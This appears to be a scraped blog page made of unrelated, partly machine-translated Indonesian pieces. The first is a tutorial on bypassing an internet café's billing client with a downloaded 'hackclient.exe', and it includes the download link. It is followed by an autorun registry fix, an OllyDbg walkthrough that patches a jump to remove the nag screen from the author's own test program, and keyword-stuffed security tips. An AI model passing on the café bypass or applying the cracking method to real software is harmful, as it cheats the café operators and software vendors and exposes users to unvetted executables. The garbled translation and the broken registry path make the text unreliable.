Halo semua, bosan dengan teknik hacking itu-itu dan lebih tersebar di Internet? Kali ini saya akan memberikan tutorial hacking kecil yang dapat diterapkan ringan dan insya Allah semua orang: D. Untuk belajar tidaklah sulit sebenarnya, tidak memerlukan keahlian khusus dan bahkan orang-orang biasa yang hanya sekedar mampir kafe bisa melakukan ini .

Ya, Anda mungkin berpikir dengan cara ini adalah cara saya melakukan bunuh diri. Kok-ingin ya ingin operator warnet mengajarkan anda bagaimana mengakali warnetnya sendiri? Bukan tanpa alasan, saya melakukan ini karena saya menyadari bahwa ilmu merupakan suatu karunia dari Tuhan Yang Maha Esa, dan untuk menyembunyikan pengetahuan yang berarti aku harus mengingkari nikmat Allah. Jadi setiap orang di dunia berhak untuk ilmu.

kegiatan Segera, Penagihan Explorer Client hacking, saya menggunakan bantuan program yang disebut hackclient.exe yang saya temukan dari forum HNC. Karena ada kurang lengkap tutorial kemudian sebagai tanda penghargaan untuk membuat pengetahuan yang saya dapatkan jadi saya membuat tutorial ini sederhana.

Di pintu masuk kafe sebagai Personal dan program aplikasi mempersiapkan hackclient.exe modal yang bisa diperoleh dari http://www.4shared.com/file/Xyw_iMyz/hackclient.html

Jika Anda punya dan menjalankan aplikasi. Kemudian tampilan berikut akan muncul seperti ini:

Perhatikan ada 2 program penagihan klien, bingung gag memiliki gambar yang muncul di atas merupakan penagihan klien palsu, sedangkan yang asli adalah di paling kiri, yang tampak paling sederhana, dan bahwa pada awal sebelum Anda telah melihat.

Ikuti petunjuk pada urutan program client billing yang ada palsu. Jika Anda beruntung maka Anda dapat keluar dari program penagihan klien dan menikmati fasilitas hampir semua jendela terkunci oleh penagihan klien asli.

Perhatikan bahwa metode ini tidak akan mengurangi nilai nominal yang tercantum dalam server billing (operator) Anda harus membayar. Lebih baik tutorial ini digunakan untuk pembelajaran bukan untuk perbuatan jahat. operator warnetnya Miskin dan pemilik, untuk mendapatkan perak pada tahun 2000 terhalang oleh tindakan pengguna aplikasi ini.

disable-autorun-inf-avoid-virus

Some people there are who think that the file autorun.inf is a virus, but it was not. Autorun.inf is a file system used by the operating system like Windows to automatically run programs when removable media such as CD-ROM, DVD-ROM or USB Flash inserted in the computer. for reasons of convenience features designed for a software that is installed on a disk can automatically start when the disk is inserted.
Unfortunately autorun.inf fact create new problems. this feature is used to spread viruses. User security is threatened, those who do not intend to run a software forced to wide-eyed with the condition could not do anything to stop the virus directly berakasi, as in the case of some viruses, that utilize this feature to spread. This is called A feature of Windows has failed?


Me Disable AutoPlay is not a solution because when you open the drive from My Computer, Windows still will run the instructions found in autorun.inf.


There is a difference between AutoPlay and autorun. Autoplay is when you insert a CD / DVD or USB flash drive, you get a dialog box that asks what you want to do Windows, while the autorun will immediately execute the command in the autorun.inf file. and when it runs do not exist at all a chance for you to cancel the autorun.

How to disable autorun.

Step 1: Click Start-> Run or press Window + R on your keyboard to display the Run dialog box.

Step 2: Type regedit and press Enter to run Registry Editor.

Step 3: In the left pane double-click a folder to expand and go into

HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Policies / Explorer

Step 4: In the right pane double-click NoDriveTypeAutoRun

Step 5: In the Value Data, type FF to 255 for Hexadecimal or decimal value.

Step 6: Close the Registry Editor and restart the computer.

How to disable autorun with Notepad
Here is a registry key that you can use to block autorun.inf. Open notepad or another text editor, copy the text below and save it as NoAutoRun.reg. Make sure the save with the extension. Reg no. Txt.

REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIniFileMappingAutorun.inf]
@ = "@ SYS: DoesNotExist"

Run the file, click Yes if there is confirmation.
The problem with this hack is that the installer CD or DVD will no longer run automatically, you should find the setup file with the manual. but I think it is no big deal compared to being infected by a virus and had to spend hours cleaning it.

Cracking software Messagebox

Written by: MRHPx aka Rizal
Written on: 1st June 2o11, Purwosari-Pasuruan, Indonesia

HackINTRO
This article is for all levels of readers, there is no difference, Leet, Newbie, across all borders, NO-SARA, We're the one for equality .. Punk rock, oi-oi! : D Previously I would like to convey greetings of respect and friendship to all his fellow hacker who never knew I was in Indonesia, especially fellow veterans h4xx0r amazing .. : D

Have met with trial software or use an alias shareware shareware? Shareware is a trial program (not free) which has limited and requires the user to buy or pay for the software before it can be used in full or no restrictions. This article will try to discuss the most basic of protection schemes paid software (shareware). One scheme is quite popular shareware or Nag dialog box that displays messages about the status of software, whether it has been purchased (Registered) or still trial (Unregistered). Actually this article is a modification of one of the seminar material in mid-2009 I for the education department of Computer Science, at which time I was asked to demonstrate a simple demo of cracking which is often found on shareware scheme.

This article is NOT intended to teach you how to steal or hijack the paid software, but more priority to the understanding of the vulnerability of a system. None of the targets that are used as guinea pigs in this article who is a shareware other party. Target provided is software I personally made, so no other party the aggrieved here unless I am (The period of rest at home after work because writing this article is trimmed and trimmed down because I am a private money used to pay for internet broadband connection to download the compiler Assembler and post articles. .)

To all "Prankster" aka "Not Action Talk Only" which is always negative in assessing the activities of hackers, you should read first before judging .. why are you even that noisy? Though in use of time, effort and money I am personally, not yours! Unable to sign envious ..



Tool On Demand:

1. Ollydbg, you can get in www.ollydbg.de.
2. File target "Target.exe" has been included with this article or visit the website at www.mrhpx.co.nr I (I make it in person to avoid copyright infringement and DMCA law that suck!)
3. Knowledge of the Assembly (Do not know at all is also no problem: D)
4. Red Palmall .. (For motivation and inspiration .. And also help increase government tax revenues of the Republic of Indonesia: D)
5. Rice - Places Terakhir.mp3 .. (The song is good, to update the database of music and soul, remember do not buy bootleg!: D)



Target Description
Character targets as mentioned above is showing Nagscreen or MessageBox at the beginning of the software is run. To eliminate the appearance of Nagscreen MessageBox, the user must make a purchase.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot NagScreen
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


Work to be done here is a MessageBox or disable the message dialog box. So the software will not show the MessageBox again early in the software is run for good.

Nothing is more fun in the field of computer security in addition to analyzing the Reverse Engineering Binary file. My colleagues are curious to deface Web site issues, Rootkits, Software Cracking, Penetration Systems, DDoS, Buffer Overflow and the like shall study the Reverse Engineering. From this area that all security issues arise, both about Exploit, Vulnerable or Bugs System and others. Before reading further I highly recommend to you to read the article I entitled "Executable Injection Tutorial - Part 1: MessageBox" and "Executable Injection Tutorial-Part 2-Splash Screen" The second article can assist you in understanding the basis of Reverse Engineering if you difficulty when reading this article.



The Beginning
Run Ollydbg then load "Target.exe" .. The display will look like in the screenshot below. Especially for those who are included in levels rather than a newbie, here you would be able to read the Entry Point (EP) and determine the steps to break the protection.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


Screenshot Target Load
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

NOTE: Address listed on your computer may vary from that contained in this article. Always follow the address on your computer.

On the main screen, right click-> Search for-> All referenced text strings. After that you will be in a new window that displays a variety of string, try to find and point your mouse on a string that reads "shareware software COOL # 1 in the World and the Subconscious", then double click or press enter.

You will come back to the main window, you just point the mouse one line up precisely address 1314156F in instruction "6A 24" or "PUSH 24". You will see a red arrow "Conditional Jump" or "Leap With Paying attention to the" originating from address 13141533 "EB 3A".

MessageBox (Win32 Programmer's Reference)
MessageBox function creates, displays and operates a message dialog. The dialogue message includes a picture-messaging application and title, plus various combinations of button press and the icons that are known.

Info
Windows NT: Yes
Win95: Yes
Win32s: Yes
Import Library: user32.lib
File Header: winuser.h
Unicode: WinNT, Win95
Platform Notes: None

Syntax
int MessageBox (
HWND hWnd, / / ​​handle of owner window
LpText LPCTSTR, / / ​​address of text in message box
LpCaption LPCTSTR, / / ​​address of title of message box
Uint uType / / style of message box
);

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


Screenshot Assembly Code
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$



Logical, Analyze, ATTACK .. CRACKadabra! ™
When the software is run will go directly to the address 13141533 "EB 3A". Which serves to carry the instruction at address 1314156F "PUSH 24" which contains Nagscreen or MessageBox. At address 13141586 "CMP EAX, 7" software to conduct examination, namely:

1. If the user presses the "No" address 13141589 "JE SHORT TARGET.1314158D" then the code will be landed at address 1314158D "PUSH 0" which will cause the software exit.
2. Meanwhile, if the user presses the "Yes" address 1314158B "JMP SHORT TARGET.13141594" then the code will be landed at address 13141594 "PUSH 0" which will cause the software runs normally.

From the above analysis data, one finds several methods that can be used to disable Nagscreen or MessageBox. I'm not the type of hacker who stingy or stupid and matre Hacker types who like to sell fast Hacker techniques stale, like most expensive book Hackers often you find in online and offline bookstores around you. I do not want to just give one method alone, I prefer to give you some methods in solving problems. People who have only one method of strategy in the face of the opponent is a pretty silly. Several methods can be used, namely:

1. Method 1 - JUMP

Change the leap, it is the most effective and efficient manner. Ie change the direction of the jump instruction, this technique requires only 1 byte value changes only!

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot Method 1 - JUMP
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

To apply this technique is fairly easy, at address 13141533 "JMP SHORT TARGET.1314156F", change the value of "EB 3A" to "EB 5F". This will make the software ignore or MessageBox Nagscreen code and go directly to the address 13141594 "PUSH 0" to run the program normally .. WITHOUT NAGSCREEN!
2. Method 2 - NOP

Negate the process of instruction, this method is effective but less efficient way to remember a lot of Code Cave formation. That is by eliminating some instruction in a way that does not change as the instruction is executed.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Screenshot Method 2 - NOP
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

To apply this technique, simply block the cursor from the address 1314156F "PUSH 24" up to 13,141,581 "CALL " (see Screenshot Assembly Reference Code). Then right click-> Binary-> Fill with NOPs. This will make the software no longer has Nagscreen or MessageBox, though instructions are still there but the examination did not affect the performance of the software. That way the software will go to address 13141594 "PUSH 0" to run the program normally .. WITHOUT NAGSCREEN!

Final Notes
The task has been successfully done properly, the software "Target.exe" no longer displays Nagscreen or MessageBox. Easy is not it? Not until 1 minute, Nagscreen successfully overpowered. Software "Target.exe" is just one obvious example of bugs due to negligence Programmer shareware (Maybe programmers went to college majoring in management science and animal health as I am, so a little forgotten about the programming the right way: D). Why is that? Because of the above techniques use "Text String" as a reference.

If only the software using technologies such as obfuscation or hiding a string of course will not be as easy as it successfully disabled. Believe it or not, nearly 70% of shareware software worldwide use and display the MessageBox Nagscreen or Text String! Mainly domestic production shareware software! I'm sure you can imagine how complicated life as a programmer with the risk of their software pirated. Advice for you, never use pirated software. If you do not have money, menabunglah, buy an official license if you already have the money or use Open Source. Programmers also need to eat, they sell the software to be earning. Hacker was born to help others, not harming others. Hopefully this article useful to you and I can help you secure yourself from cyber crime. I am a hacker .. I am a Cracker .. But I am still a Farmer! :)

CONTACT ADDRESS
Website: www.mrhpx.co.nr
Mirror: www.mrhpx.astalavista.ms
Email: mrhpx [@] yahoo.com / nemesisbyte [@] yahoo.com / mrhpx [@] binushacker.org
Facebook: www.facebook.com / mrhpx (Send Message Add a new first, to avoid spammers!)

Greetz:
My Family .. My Love .. My Cats .. My God and Prophet .. AstaLaVista .. 0day .. All WHO friends help me a lot in IRIS Until this day, Lucifer, BlackStorm, Beat Jaya, BinusHacker, IRC, UCF, dT, AGAIN, water, LZ0, FOSi, assign, DVT, 29A, TSRh, tPORT, FFF .. All Indonesia veterans haxx0r .. Underground communities .. Fellow in college at Univ. Islam Malang, Univ. UB Malang, Univ. Malang .. Colleagues at the PT. Malindo Feedmill, PT. Patriot Panca Prima, PT. Joyo Wonokoyo herein, PT. Samsung Cheil Jedang Group, PT. Charoen Pokphand Indonesia and My Family Bussines Company (Mutter.. Vermogen Ich, Ich versuchen, Ich niemals Mude.)

How to improve computer security

Here are sharing about the various ways to increase computer security, the latest computer security, computer security, 2011, computer security tips, tricks computer security, how to keep the computer, how to increase computer security, how secure a computer, computer security, how to increase your latest computer security, computer menjada way of crackers, improve computer security, computer security added, maximization of computer security, computer security max. increase of computer security, computer security updates, tipss secure the computer, tips on increasing your computer, how to make your computer safe, how to make your computer secure, how to make computers make it more secure, safe way to make computers,, how to secure computers, 2011, Indonesia computer security.
Main Step Securing Computers

For both computer users who connect to the internet or not, it's time to find out that the danger of computer crime continues to lurk either consciously or unconsciously, just waiting for the right time to destroy the contents of your computer.

Related to the news in online media, about the spread of viruses melesatnya locally made no less merepotkannya with the virus overseas, then I am reminded to friends reader should always be alert. And be aware that I have outlined to 9 the first step in securing your computer. Remember, this is 9 a first step, awareness and update your knowledge about new ways used by criminals still always required.

Today, computer users in Indonesia are mostly using Microsoft Windows as the operating system, and this step is intended for the operating system.

1. Operating System Upgrade

Operating system upgrade to a newer, at least stay abreast of the latest programs available.

* Microsoft Windows XP users upgrade to Microsoft Windows XP Service Pack (SP) 2.
* For users of Microsoft Windows 95/98/ME/NT, are advised to upgrade to a higher level.
* Closing security holes in operating systems by installing the latest security patches.

2. Use a Firewall

A firewall helps protect computers from malicious hackers, worms, and some spyware.

* Use the Windows Firewall (available in Windows XP SP2) or other firewall products either have to purchase or for free. Some commercial firewall program is ZoneAlarm, Agnitum Outpost Personal Firewall, Checkpoint Firewall, etc.. While the games like Comodo Personal Firewall, Sunbelt Personal Firewall,
* For broadband Internet users, make sure the router has a firewall.

3. Install Antivirus

Antivirus protects us from access to computer viruses and other malicious attacks such as trojans and worms. Antivirus can look for viruses, trojans, and worms that dwell in the computer and scanner on incoming email and outgoing email. Most important are:

* Make sure your Antivirus is always set to update his knowledge of the latest viruses.
* Make sure your antivirus program is the latest version.
* Do not open email attachments from people you do not know.
* Perform the scanner (scanning) to removable devices such as external hard disk, USB disk, or CD / DVD which sometimes activate the auto-run.

4. Always Update

Just like the operating system, software that continues to be updated will be free from the problem of security weaknesses. Also, use the latest programs to keep abreast of security developments of the program.

5. Prevent Spyware

Spyware is a small program that landed on our computers to record and transmit all the data and activities that occur on your computer, of course, only the pembuatlah desired activity is recorded, such as keyboard activity by a keylogger.

Prevent spyware can be done by:

* Beware of files that you open or download via the Internet or email.
* Do not install programs that do not clear the manufacturer.
* Do not indiscriminate surfing to sites that have a high risk level. For example: many porn sites that contain spyware.

Eliminate spyware can use programs like Windows Defender AntiSpyware, Ad-Aware, Spybot Search & Destroy, etc then do the scanner in the entire computer. Make sure the program always do automatic updates and scan your computer every day before you start work.

6. Secure Wireless Connection (Wireless)

If you have a wireless network, always follow the installation and documentation:

* Use MAC filtering to restrict the use of a trusted computer only.
* Use WPA or WPA2 encryption is more secure to reduce the risk of interception.

7. Limiting the Risk of Email Spam

There are several things you can do to reduce the risk of spam:

* Do not click on any of the emails that have been identified as spam.
* Split between personal email / office with emails that are used specifically to register online.
* Use an email client that has been integrated with the spam filter or install spam filtering program.

8. Backup

Always back up important files and store in a safe place, make sure the files terbackup well and do not contain malware.

9. Physical Security

* Create a "security" on your computer and other items that you think is important, so always remember that these items need security.
* Make sure not to leave small notes everywhere.
* Record all serial numbers and do not let others know.
* Make sure doors, windows, garage locked properly. Motion detectors and alarms improve your home security.
* Do not let the computer visible from outside the house, it will invite thieves.
* Use an additional lock for the laptop, eg fingerprint, usb dongle, etc..
* Use a bag that has extra security for laptops.
* Be careful when your vehicle to crash the street, for example: a flat tire, which is often used by criminals to steal your laptop.

Src: http://think [.] Securityfirst [.] Web [.] Id
Securing Your Computer From Viruses

Is your computer affected by virus? Did you find a strange message on your screen that previously did not appear? Do you feel your computer is more and more slowly? Okay, this is a common problem found by computer owners all over the world. There are many viruses and worms out there that can infect your computer.

Some effects of the virus is very diverse. There is at normal level category, meaning that only affect the performance of the system on your computer. At a higher level of virus also can menghapud your important data. Very fatal once, even a virus can also damage your computer system. For computers that connect networks, could be a virus can turn your computer as a zombie computer (a computer-controlled by someone else).

How, terrible rather than the effects of a virus attack on your computer. Tips below may need to know to overcome or at least prevent a virus attack from outside.

1. E-mail is one way of spreading the virus of the easiest and most dangerous. Make sure you open the e-mail from sources that you make sure they were correct. If the e-mail that you get comes from sources that you do not know or do not come from the contacts list you have, immediately delete the e-mail. Make sure the incoming SPAM list soon emptied. Never once to open it.

2. USB Flash Disk is the method most widely spread of the virus second only to e-mail. So make sure your anti virus updated well before the USB Flash Disk incoming connect on your computer. Scan first before opening. How open is also not in the double click, but with right-click and select Open. This method is safer to avoid the viruses that enter via autoruns which is included in USB Flash Disk.

3. Be careful to use e-mail client program such as Microsoft Outlook. Make sure the program is updated properly. If the operating system you are using is pirated, I suggest you use e-mail clients that are free and can be updated automatically, such as Mozilla Thunderbird or Pegasus.

4. Everyone must know the internet is a source of spread of the virus in the world. Nearly 80% of viruses spread through this route. The following safety tips when you do the surfing world in the realm of the internet: - Do not click on pop-up window that appears. For example, notice that you are the winner of a lottery or click a few times then you'll win a lottery. Actually it is a malicious program that automatically will send a trojan or spyware to your computer. - You can use the feature or program atomatis block on pop-ups that will be displayed. This feature is usually already included in the web browser you use.

5. Search engines such as Google sometimes can not filter out sites that are regarded as dangerous. For that you can install a program that can automatically detect sites that are not worth a visit or dangerous. Free programs you can use is AVG Link Scanner. AVG Free program is able to detect artificial sites google search results. If the site contains a malicious virus, it will display a warning or will be automatically blocked sites can not be opened.

6. Install anti-virus you can trust. It does not have a paid anti-virus, for home users / personal you can use anti-virus free is no less popular with the anti-viral paid, such as Avira, AVG, Clamav, and others. Make sure you do the updates regularly to ensure that you install anti-virus capable of holding the virus that are increasingly developing its ability.

7. Install anti-Spyware is also to prevent the introduction of malware and spyware. Both these malicious programs in addition to making the computer is running slow, also can mengahantarkan your computer as a zombie computer that can control the people out there. Some anti-spyware program free is quite famous is Spyware Doctor, Spyware Terminator, etc.

8. Never open attachments that are included in the e-mail from an unknown source properly. Although attachment of the included file is a file format that is rarely carry viruses such as. Txt,. Jpeg,. Gif,. Bmp,. Tif,. Mp3,. Htm,. Html, and. Avi, but make sure you do a scan beforehand.

9. Use a disk (CD / DVD) to mengimpan / backing up important data that are not easily infected with the virus. CD / DVD is only read only (only readable), but make sure before they are placed into the disk, the data have been liberated from the virus. Karen if data bervirus, then it's useless to be stored on the disk.

10. Set the operating system you use to always do the updates regularly. This can reduce the risk of virus attacks from outside because the gap of viral entry have been closed by the updates that you do. But the update can only be successful if the operating system you are using is genuine. If not I suggest you use a free operating system such as Linux.

11. When you download programs from warez sites, make sure your anti-virus installed and updated properly. Files that are derived from these sites sometimes deliberately infiltrated by a dangerous virus.

12. Finally I suggest, do not visit sites that contain malicious viruses and malicious programs that can harm your computer itself, such as warez sites, crack, serial, porn, and others.

Similarly, 12 tips you can do to secure your computer from virus attacks. One thing you need to understand "keep / care is better than cure".

Src: http://idecapung [.] Blogspot [.] Com /


Securing Your Computer From Cracker

1. Blocking Remote Access. To prevent your PC taken over by hackers,
disable Remote Access. Dlm Start menu, right click on "My Computer" & select "Properties".
Then there is the "System Properties", then select the tab "Remote",
dismiss / remove the sign (V) which are in front of all the options that exist to disable it. Then click "OK".

2. Removing unused User Accounts => On the "Windows XP Professional" there are several user accounts
which can be accessed through the trojan and utilized to perform the attack.
To get rid select the Start menu, select "Control Panel", select "Performance and Maintenance".
Then select "Administrative Tools", click 2 times "Computer Management". Select "Local Users and Groups",
on the right side 2 times pd click the "Users". You can delete the old accounts that you use non-
(Image users who have an X). Then close the tampilan2 earlier.

3. Closing the gap NetBIOS => file2 your documents can be accessed via the Internet then nonaktifkanlah NetBIOS.
Dlm Start menu, right click on "My Network Place" & select "Properties". Then there is the "Network Connections".
Then right-click the Internet connection icon you are available, choose "Properties". If no display, select the tab "Networking". Tick ​​(V) which are in front of "Internet Protocol (TCP / IP), then click the tab" Properties "which is underneath. Then there is the "Internet Protocol (TCP / IP) Properties", select "Advanced" tab. Display no more "Advaced TCP / IP Settings", select the tab "Wins", and select "Disable NetBIOS over TCP / IP. Click 'OK'.

4. Response to BO2K on Windows 9x. BO2K can be tracked with port scanning.
Usually pd Windows 9x an open port that is only one port 139 (NetBIOS).
Therefore need to be suspected if we know there is another port other than an open port 139.
Circulating anti-virus program is currently able to detect the existence of this program.
Make sure you have to download the latest version of anti-virus program. Rajin2 is to open the Windows registry. Usually pd Windows 9x, because BO2K embed themselves in

"HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunServices"

or on

"HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run".

5. Security BIOS on the Server => BIOS is the low level software which is useful for configuring
or manipulation of the hardware on x86-based PC. MS Windows and Lilo from Linux to use it for
determine the procedure for booting on your PC. You need to protect your BIOS with a password given to him.
This method is also useful for preventing the use of booting up via floppy disk. This way ill give the maximum protection of your PC, but it can complicate other org mengacak2 for your PC. Keep in mind that the current BIOS flashroom method, which allows us to change configuration or even remove them altogether.

6. CGI Abuse Shell on Unix / Linux => There are some pretty powerful way of reply to address them:

a. You plug-chrooted Apache Jail on you so that the command which can be run to your limit.

b. Minor Tweaks CGI Source Code of the facility who would you give such as Perl,
then you turn off the facility system () function ... Smile

c. Minimize the occurrence of local exploits on your system often tinkering with & follow the news
about security.

7. Removing non-COM components are needed pd Windows 2000/XP/Etc => Some non-COM components required by
almost all applications must be removed. Consider first before deleting it because every component of each other
associated with a file system & dictionary objects. In the Start menu select Internet Explorer,
on "Tools" menu select "Internet Options". If no display, select the tab "Connections".
In the "Dial-up and Virtual Private Network Settings" delete COM Unresponsive needed with clicking on it and select
"Remove". Then click 'OK'.

8. Enable Firewall => For Hackers & attacker did not get to your PC, it takes a Firewall.

9. Installing Anti-Virus => antivirus software does not just get rid of viruses, worms, or other destructive files
but also protects your PC from the threat of attack script on the website.

10. Do you do a chat on MIRC before the above tips into practice,
kalo lo ngak company would be attacked by hackers because IP temen "can diliat via MIRC.

Src: http://www [.] Okeaja [.] Co [.] Cc

Good luck how to improve computer security, how to keep the computer, how to increase computer security, how secure a computer, computer security, how to increase your latest computer security, computer menjada way of crackers, improve computer security, added computer security, computer security maximization, maximum computer security . increase of computer security, computer security updates, tipss secure the computer, tips on increasing your computer, how to make your computer safe, how to make your computer secure, how to make computers more secure so, how to secure computers.

May be useful:)